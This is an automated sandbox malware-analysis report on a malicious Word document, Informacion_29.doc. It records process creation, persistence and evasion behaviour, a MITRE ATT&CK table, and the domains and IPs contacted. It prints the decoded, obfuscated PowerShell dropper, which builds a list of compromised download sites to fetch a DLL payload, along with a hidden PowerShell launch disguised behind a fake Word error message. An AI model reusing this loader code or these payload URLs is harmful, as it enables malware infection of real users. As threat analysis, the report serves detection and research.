Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [base64 payload omitted]
PowerShell case anomaly found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [base64 payload omitted]
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [base64 payload omitted]
Suspicious powershell command line found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [base64 payload omitted]
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [base64 payload omitted]

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (55 identical entries)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (6 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (55 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2540 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000005.00000002.2217476466.0000000000394000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found
Source: unknown | Process created: Base64 decoded $U6351=[TYpE]("{2}{0}{1}{4}{3}{5}" -F 'ySTEm.i','O.di','s','EcTO','R','RY') ;$OLV = [tYpe]("{0}{7}{1}{8}{3}{6}{5}{2}{4}" -F'sY','TEm.NE','ntmAN','v','AGeR','I','iCePO','s','T.seR') ; $ErrorActionPreference = ('Si'+('le'+'n')+'t'+('ly'+'C')+('onti'+'n'+'ue'));$Ytd_ppb=$H4_L + [char](64) + $Q01Q;$E15N=(('O'+'1_')+'V'); ( geT-VaRiable u6351 -VaLUEoNLy )::"cRE`ATedIr`eC`Tory"($HOME + (('{0}N'+('sgh'+'o')+'ht{0}'+'G'+'b'+('h5r'+'9o')+'{0}') -f [cHaR]92));$N95W=(('S'+'28')+'S'); ( Ls vArIABle:olV).VAlUE::"SECUr`ITY`PrOTO`coL" = ('Tl'+('s1'+'2'));$K_2L=('B6'+'7O');$Bexo28t = ('Q2'+'7V');$M69N=(('U'+'72')+'A');$Zc7n7y_=$HOME+(('{'+'0'+'}'+('N'+'sg')+'hoht{0}'+'G'+('b'+'h5r')+'9o{0}') -F[CHAR]92)+$Bexo28t+('.d'+'ll');$N_1W=(('M'+'34')+'Y');$Ile_vaa=(']'+('b2'+'['+'s://w'+'heel')+'co'+'mo'+'vi'+('n'+'g.co'+'m/p')+'/R'+'u'+'M'+('eRP'+'a')+'/@'+(']'+'b2[s:/')+('/'+'00')+'z'+('y'+'ku')+'.'+'co'+('m/w'+'p'+'-admin/'+'e')+('Yu1'+'Q/')+'@]'+'b'+('2['+'s://k')+('e'+'tore')+('se'+'tm')+('e'+'.com')+'/w'+'p'+('-'+'cont')+('e'+'nt/pmJ')+'/'+('@'+']b')+'2'+('['+'ss:/'+'/')+('ryco'+'m')+'p'+('ut'+'e')+'r.'+('com/c'+'on')+('ten'+'t/T')+('L/@]'+'b'+'2[s'+'s')+(':'+'//')+'d-'+('c'+'em'+'.com')+'/'+'wp'+('-a'+'d')+('m'+'in')+'/'+('J'+'SLwG1')+('/@]b2[s'+':'+'/')+'/'+('thebes'+'t')+'f'+('ikra'+'h.'+'co')+'m'+('/wp-'+'adm'+'i'+'n/')+('f'+'OIl'+'VX/@')+(']b2'+'[')+('ss:/'+'/')+('ph'+'aw')+('aya'+'ge')+'n'+('cy'+'.com/')+'w'+'p'+('-'+'ad')+'mi'+'n'+('/'+'mXo')+'4b'+'/')."rep`L`ACE"(((']b'
Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded $U6351=[TYpE]("{2}{0}{1}{4}{3}{5}" -F 'ySTEm.i','O.di','s','EcTO','R','RY') ;$OLV = [tYpe]("{0}{7}{1}{8}{3}{6}{5}{2}{4}" -F'sY','TEm.NE','ntmAN','v','AGeR','I','iCePO','s','T.seR') ; $ErrorActionPreference = ('Si'+('le'+'n')+'t'+('ly'+'C')+('onti'+'n'+'ue'));$Ytd_ppb=$H4_L + [char](64) + $Q01Q;$E15N=(('O'+'1_')+'V'); ( geT-VaRiable u6351 -VaLUEoNLy )::"cRE`ATedIr`eC`Tory"($HOME + (('{0}N'+('sgh'+'o')+'ht{0}'+'G'+'b'+('h5r'+'9o')+'{0}') -f [cHaR]92));$N95W=(('S'+'28')+'S'); ( Ls vArIABle:olV).VAlUE::"SECUr`ITY`PrOTO`coL" = ('Tl'+('s1'+'2'));$K_2L=('B6'+'7O');$Bexo28t = ('Q2'+'7V');$M69N=(('U'+'72')+'A');$Zc7n7y_=$HOME+(('{'+'0'+'}'+('N'+'sg')+'hoht{0}'+'G'+('b'+'h5r')+'9o{0}') -F[CHAR]92)+$Bexo28t+('.d'+'ll');$N_1W=(('M'+'34')+'Y');$Ile_vaa=(']'+('b2'+'['+'s://w'+'heel')+'co'+'mo'+'vi'+('n'+'g.co'+'m/p')+'/R'+'u'+'M'+('eRP'+'a')+'/@'+(']'+'b2[s:/')+('/'+'00')+'z'+('y'+'ku')+'.'+'co'+('m/w'+'p'+'-admin/'+'e')+('Yu1'+'Q/')+'@]'+'b'+('2['+'s://k')+('e'+'tore')+('se'+'tm')+('e'+'.com')+'/w'+'p'+('-'+'cont')+('e'+'nt/pmJ')+'/'+('@'+']b')+'2'+('['+'ss:/'+'/')+('ryco'+'m')+'p'+('ut'+'e')+'r.'+('com/c'+'on')+('ten'+'t/T')+('L/@]'+'b'+'2[s'+'s')+(':'+'//')+'d-'+('c'+'em'+'.com')+'/'+'wp'+('-a'+'d')+('m'+'in')+'/'+('J'+'SLwG1')+('/@]b2[s'+':'+'/')+'/'+('thebes'+'t')+'f'+('ikra'+'h.'+'co')+'m'+('/wp-'+'adm'+'i'+'n/')+('f'+'OIl'+'VX/@')+(']b2'+'[')+('ss:/'+'/')+('ph'+'aw')+('aya'+'ge')+'n'+('cy'+'.com/')+'w'+'p'+('-'+'ad')+'mi'+'n'+('/'+'mXo')+'4b'+'/')."rep`L`ACE"(((']b'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [base64 payload omitted]
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [base64 payload omitted]
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [base64 payload omitted]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation

MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 1 1 | Path Interception | Process Injection 1 1 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Command and Scripting Interpreter 2 1 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Scripting 2 2 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 2 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Exploitation for Client Execution 3 | Logon Script (Mac) | Logon Script (Mac) | Process Injection 1 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 4 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | PowerShell 3 | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 3 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting 2 2 | Cached Domain Credentials | System Information Discovery 1 3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

Behavior Graph


Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Informacion_29.doc | 63% | Virustotal |
Informacion_29.doc | 79% | ReversingLabs | Document-Office.Trojan.GenScript

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs


Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
rycomputer.com | 58.97.195.135 | true | true | | unknown
phawayagency.com | 35.209.78.196 | true | true | | unknown
00zyku.com | 193.187.117.26 | true | true | | unknown
wheelcomoving.com | 66.85.46.76 | true | true | | unknown
thebestfikrah.com | 103.8.25.63 | true | true | | unknown
d-cem.com | 35.214.169.246 | true | true | | unknown
ketoresetme.com | 70.32.23.58 | true | true | | unknown

URLs from Memory and Binaries

                                    • Avira URL Cloud: safe
                                    unknown
                                    https://rycomputer.compowershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://wheelcomoving.com/wp-content/themes/cargo/js/jquery.magnific-popup.min.js?ver=5.6powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/#respondpowershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://thebestfikrah.com/wp-content/themes/oceanwp/assets/js/main.min.js?ver=2.0.2powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://ketoresetme.com/category/keto-diet/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://thebestfikrah.com/solution/articles-the-central-message/powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1024x146.pngpowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown

                                    Contacted IPs


                                    Public

IP               Domain    Country         ASN      ASN Name                                 Malicious
66.85.46.76      unknown   United States   393960   HOST4GEEKS-LLCUS                         true
103.8.25.63      unknown   Malaysia        132241   SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY       true
58.97.195.135    unknown   Bangladesh      7470     TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH    true
35.214.169.246   unknown   United States   19527    GOOGLE-2US                               true
193.187.117.26   unknown   Netherlands     55933    CLOUDIE-AS-APCloudieLimitedHK            true
70.32.23.58      unknown   United States   55293    A2HOSTINGUS                              true
35.209.78.196    unknown   United States   19527    GOOGLE-2US                               true

                                    General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 336937
Start date: 07.01.2021
Start time: 11:46:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 1s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Informacion_29.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal96.troj.evad.winDOC@6/6@8/7
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 3
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                    • Execution Graph export aborted for target powershell.exe, PID 2028 because it is empty
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.

                                    Simulations

                                    Behavior and APIs

Time       Type              Description
11:46:38   API Interceptor   1x Sleep call for process: msg.exe modified
11:46:39   API Interceptor   460x Sleep call for process: powershell.exe modified

                                    Joe Sandbox View / Context

                                    IPs

Columns: Match; Associated Sample Name / URL; Detection; Context
Match: 66.85.46.76
  Informacion_122020_EUH-4262717.doc         malicious   wheelcomoving.com/p/RuMeRPa/
  1923620_YY-5094713.doc                     malicious   wheelcomoving.com/p/RuMeRPa/
  Doc 2912 75513.doc                         malicious   wheelcomoving.com/p/RuMeRPa/
  DAT.doc                                    malicious   wheelcomoving.com/p/RuMeRPa/
  ARCHIVOFile_762-36284.doc                  malicious   wheelcomoving.com/p/RuMeRPa/
  4640-2912-122020.doc                       malicious   wheelcomoving.com/p/RuMeRPa/
  MENSAJE_29_2020.doc                        malicious   wheelcomoving.com/p/RuMeRPa/
  MENSAJE_29_2020.doc                        malicious   wheelcomoving.com/p/RuMeRPa/
  MENSAJE.doc                                malicious   wheelcomoving.com/p/RuMeRPa/
  Dati.doc                                   malicious   wheelcomoving.com/p/RuMeRPa/
  ARCH.doc                                   malicious   wheelcomoving.com/p/RuMeRPa/
  LIST_20201229_1397.doc                     malicious   wheelcomoving.com/p/RuMeRPa/
  documento 2912 2020.doc                    malicious   wheelcomoving.com/p/RuMeRPa/
Match: 35.214.169.246
  TZ8322852306TL.doc                         malicious
  https://dj.4zido.de/i/612BRNn/             malicious
Match: 193.187.117.26
  Informacion_122020_EUH-4262717.doc         malicious
  1923620_YY-5094713.doc                     malicious
  Doc 2912 75513.doc                         malicious
Match: 70.32.23.58
  Informacion_122020_EUH-4262717.doc         malicious   ketoresetme.com/wp-content/pmJ/
  1923620_YY-5094713.doc                     malicious   ketoresetme.com/wp-content/pmJ/
  Doc 2912 75513.doc                         malicious   ketoresetme.com/wp-content/pmJ/

                                              Domains

Columns: Match; Associated Sample Name / URL; Detection; Context
Match: d-cem.com
  TZ8322852306TL.doc                         malicious   35.214.169.246
  https://dj.4zido.de/i/612BRNn/             malicious   35.214.169.246
Match: ketoresetme.com
  Informacion_122020_EUH-4262717.doc         malicious   70.32.23.58
  1923620_YY-5094713.doc                     malicious   70.32.23.58
  Doc 2912 75513.doc                         malicious   70.32.23.58
Match: 00zyku.com
  Informacion_122020_EUH-4262717.doc         malicious   193.187.117.26
  1923620_YY-5094713.doc                     malicious   193.187.117.26
  Doc 2912 75513.doc                         malicious   193.187.117.26
Match: wheelcomoving.com
  Informacion_122020_EUH-4262717.doc         malicious   66.85.46.76
  1923620_YY-5094713.doc                     malicious   66.85.46.76
  Doc 2912 75513.doc                         malicious   66.85.46.76
  DAT.doc                                    malicious   66.85.46.76
  ARCHIVOFile_762-36284.doc                  malicious   66.85.46.76
  4640-2912-122020.doc                       malicious   66.85.46.76
  MENSAJE_29_2020.doc                        malicious   66.85.46.76
  MENSAJE_29_2020.doc                        malicious   66.85.46.76
  MENSAJE.doc                                malicious   66.85.46.76
  Dati.doc                                   malicious   66.85.46.76
  ARCH.doc                                   malicious   66.85.46.76
  LIST_20201229_1397.doc                     malicious   66.85.46.76
  documento 2912 2020.doc                    malicious   66.85.46.76

                                              ASN

Columns: Match; Associated Sample Name / URL; Detection; Context
Match: GOOGLE-2US
  form.doc                                   malicious   35.214.199.246
  Nuevo pedido.exe                           malicious   35.209.33.122
  Info_122020.doc                            malicious   35.208.84.24
  84-2020-98-6493170.doc                     malicious   35.208.104.82
  rib.exe                                    malicious   35.209.110.77
  rep_2020_12_29_N918980.doc                 malicious   35.208.69.64
  Adjunto.doc                                malicious   35.214.159.46
  Messaggio-3012-2020.doc                    malicious   35.214.159.46
  Documento-2912-122020.doc                  malicious   35.208.84.24
  Documento_I_2612.doc                       malicious   35.208.84.24
  Archivo-29.doc                             malicious   35.208.69.64
  1808_2020.doc                              malicious   35.208.84.24
  file 0113165085 323975.doc                 malicious   35.214.159.46
  Inf 2020_12_30 FPJ6997.doc                 malicious   35.214.159.46
  09648_2020.doc                             malicious   35.214.159.46
  bijlagen 658.doc                           malicious   35.214.159.46
  File 2020 RVT_724564.doc                   malicious   35.214.159.46
  09922748 2020 909_3553.doc                 malicious   35.208.84.24
  info-29-122020.doc                         malicious   35.208.84.24
  ARCHIVOFile-2020-IM-65448896.doc           malicious   35.208.69.64
Match: TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH
  4WFF5Xwd2i.exe                             malicious   171.100.142.238
  https://bit.ly/2RzqidD?needed=felt         malicious   110.170.129.101
  https://bit.ly/3iAFpzv?usually=girl        malicious   110.170.129.101
  https://bodyfitline.in/cgi-bin/x8ij-010/   malicious   119.76.191.158
Match: HOST4GEEKS-LLCUS
  Informacion_122020_EUH-4262717.doc         malicious   66.85.46.76
  1923620_YY-5094713.doc                     malicious   66.85.46.76
  Doc 2912 75513.doc                         malicious   66.85.46.76
  DAT.doc                                    malicious   66.85.46.76
  ARCHIVOFile_762-36284.doc                  malicious   66.85.46.76
  4640-2912-122020.doc                       malicious   66.85.46.76
  MENSAJE_29_2020.doc                        malicious   66.85.46.76
  MENSAJE_29_2020.doc                        malicious   66.85.46.76
  MENSAJE.doc                                malicious   66.85.46.76
  Dati.doc                                   malicious   66.85.46.76
  ARCH.doc                                   malicious   66.85.46.76
  LIST_20201229_1397.doc                     malicious   66.85.46.76
  documento 2912 2020.doc                    malicious   66.85.46.76
  https://mysterygorillassafaris.com/notenotice/common/login   malicious   185.221.216.3
  DHL Receipt_pdf.exe                        malicious   185.221.216.3
  HBL CreditCard.exe                         malicious   185.221.216.3
  Invoice_pdf.exe                            malicious   185.221.216.3
  Packing list_pdf.exe                       malicious   185.221.216.3
  http://mail.strantake.casa                 malicious   172.93.120.224
  https://siyabekezela.co.za/asTitle/1-File.htm   malicious   66.85.47.62
Match: SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY
  RechnungsDetails_16_09_2020_0873352305.doc   malicious   103.8.25.12
  Payment.doc                                malicious   103.8.25.12
  DOK.doc                                    malicious   103.8.25.12
  dcyRvzSTPa.doc                             malicious   103.8.25.12
  Rech_16_09_2020.doc                        malicious   103.8.25.12
  JPZ-010920 PCL-160920.doc                  malicious   103.8.25.12
  Soumissions.doc                            malicious   103.8.25.12
  application.doc                            malicious   103.8.25.12
  430#U0437.js                               malicious   103.8.25.98
  430#U0437.js                               malicious   103.8.25.98
  https://classskincare.com/%3c              malicious   103.8.27.160
  Document.html                              malicious   103.8.26.89

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4ABB8037-B28F-4AE5-86AD-026C320EA73C}.tmp
  Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  File Type: data
  Category: dropped
  Size (bytes): 1024
  Entropy (8bit): 0.05390218305374581
  Encrypted: false
  SSDEEP: 3:ol3lYdn:4Wn
  MD5: 5D4D94EE7E06BBB0AF9584119797B23A
  SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
  SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
  SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
  Malicious: false
  Reputation: high, very likely benign file
  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Informacion_29.LNK
  Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Thu Jan 7 18:46:35 2021, length=166400, window=hide
  Category: dropped
  Size (bytes): 2068
  Entropy (8bit): 4.572427491392623
  Encrypted: false
  SSDEEP: 24:8l//XTwz6IknfeP32Dv3qKdM7dD2l//XTwz6IknfeP32Dv3qKdM7dV:8x/XT3IkfgdKQh2x/XT3IkfgdKQ/
  MD5: 2C4BEE353E86A6182A6BF563C9E194C4
  SHA1: 89218D4D65DF0BF5934D536DA28F870F240C4D98
  SHA-256: F01AEE2A3CD4410575B6F5CDB58CD003AE1BE075CDAECC4FB1DCBB1C3FE1382B
  SHA-512: 7508715741C52A93AE35FA1C982AE2C145CC62438503B47E81BA651E9B850FA3502FE2AE0296FEFFBF4C0AF1D060DCD68690B86DC7D85A54A5A2664B4B3BD728
  Malicious: false
  Reputation: low
  Preview: L..................F.... ...K...{..K...{..3.Z.-................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.....'R. .INFORM~1.DOC..R.......Q.y.Q.y*...8.....................I.n.f.o.r.m.a.c.i.o.n._.2.9...d.o.c.......|...............-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\Informacion_29.doc.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.n.f.o.r.m.a.c.i.o.n._.2.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216041..........D_....3N...W...9F.C...........[D_
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
  Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  File Type: ASCII text, with CRLF line terminators
  Category: dropped
  Size (bytes): 80
  Entropy (8bit): 4.426152982886245
  Encrypted: false
  SSDEEP: 3:M13YMvXcdruYVo0LDKXYMvXcdruYVomX13YMvXcdruYVov:MJRXzYVDWXRXzYVPRXzYVy
  MD5: 042F5F393FD36BE1B60BED04920684F5
  SHA1: 6DCD71532B488DFF0EADC5CB44ACDDC67FE38988
  SHA-256: A7D21E0CE6ADF72298D68C0C4252482FFC4BD697E1219E796B6AF2DCA3725A47
  SHA-512: 96016E41B3AC9B79B5D6314F87B21F99FA2612BAC64B79AF6055BED846FF16CA669D1548F361DDA3546A0911D226ECACF3461B5E52EC57678A2217299A89608E
  Malicious: false
  Reputation: low
  Preview: [doc]..Informacion_29.LNK=0..Informacion_29.LNK=0..[doc]..Informacion_29.LNK=0..
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
  Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  File Type: data
  Category: dropped
  Size (bytes): 162
  Entropy (8bit): 2.431160061181642
  Encrypted: false
  SSDEEP: 3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
  MD5: 6AF5EAEBE6C935D9A5422D99EEE6BEF0
  SHA1: 6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
  SHA-256: CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
  SHA-512: B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
  Malicious: false
  Reputation: moderate, very likely benign file
  Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9B7L1L5LINF2XOUZBZSO.temp
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  File Type: data
  Category: dropped
  Size (bytes): 8016
  Entropy (8bit): 3.584847739577161
  Encrypted: false
  SSDEEP: 96:chQCsMqftMqvsqvJCwokz8hQCsMqftMqvsEHyqvJCworqzkKYftJHPf8RAt+lUVY:cy3okz8y7Hnorqzkhf8RbIu
  MD5: BE362DF1966FF2BB4D114B8CBB0FF97E
  SHA1: 4EE57BEE06306F9917C2BBF971986CB6BFDB1EFB
  SHA-256: C693684C8A5409A91D60C00A1875F85E6F1DBF557706EEA1F9B79E52FD54287A
                                              SHA-512:8B03AEC2FFE750E750853C90D49BCAF413DE1FCEB660B1B2BE3F85071A283E9137F8D88212A1632A9E1E2328E01577DC9BF9B2D14FEE969F137A85A78939C332
                                              Malicious:false
                                              Reputation:low
                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                              C:\Users\user\Desktop\~$formacion_29.doc
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
